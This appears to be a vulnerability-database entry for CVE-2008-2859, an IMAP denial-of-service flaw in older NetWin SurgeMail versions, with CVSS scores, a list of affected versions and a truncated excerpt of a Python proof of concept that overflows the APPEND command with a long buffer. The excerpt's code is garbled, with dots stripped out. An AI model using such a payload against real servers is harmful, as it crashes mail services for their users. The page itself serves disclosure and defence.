5
CVSSv2

CVE-2008-2859

Published: 25/06/2008 Updated: 08/08/2017
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability Summary

Unspecified vulnerability in the IMAP service in NetWin SurgeMail prior to 3.9g2 allows remote malicious users to cause a denial of service (daemon crash) via unknown vectors related to an "imap command."

Vulnerable Product Search on Vulmon Subscribe to Product

netwin surgemail 3.8f

netwin surgemail 3.8f2

netwin surgemail 3.8k3

netwin surgemail 3.8k4

netwin surgemail 3.9c

netwin surgemail 3.9e

netwin surgemail 3.8a

netwin surgemail 3.8i2

netwin surgemail 3.8i3

netwin surgemail 3.8q

netwin surgemail 3.8s

netwin surgemail 3.8f3

netwin surgemail 3.8i

netwin surgemail 3.8m

netwin surgemail 3.8o

netwin surgemail

netwin surgemail 3.8b

netwin surgemail 3.8d

netwin surgemail 3.8k

netwin surgemail 3.8k2

netwin surgemail 3.8u

netwin surgemail 3.9a

Exploits

#!/usr/bin/python # # Surgemail version 39e-1 - (0day) Post Auth IMAP Buffer overflow DoS # Discovered by: Travis Warren # # The IMAP service contains a buffer overflow in the APPEND command # # import socket s = socketsocket(socketAF_INET, socketSOCK_STREAM) buffer = '\x41' * 3000 sconnect(('1921680103',143)) srecv(1024) ssend(' ...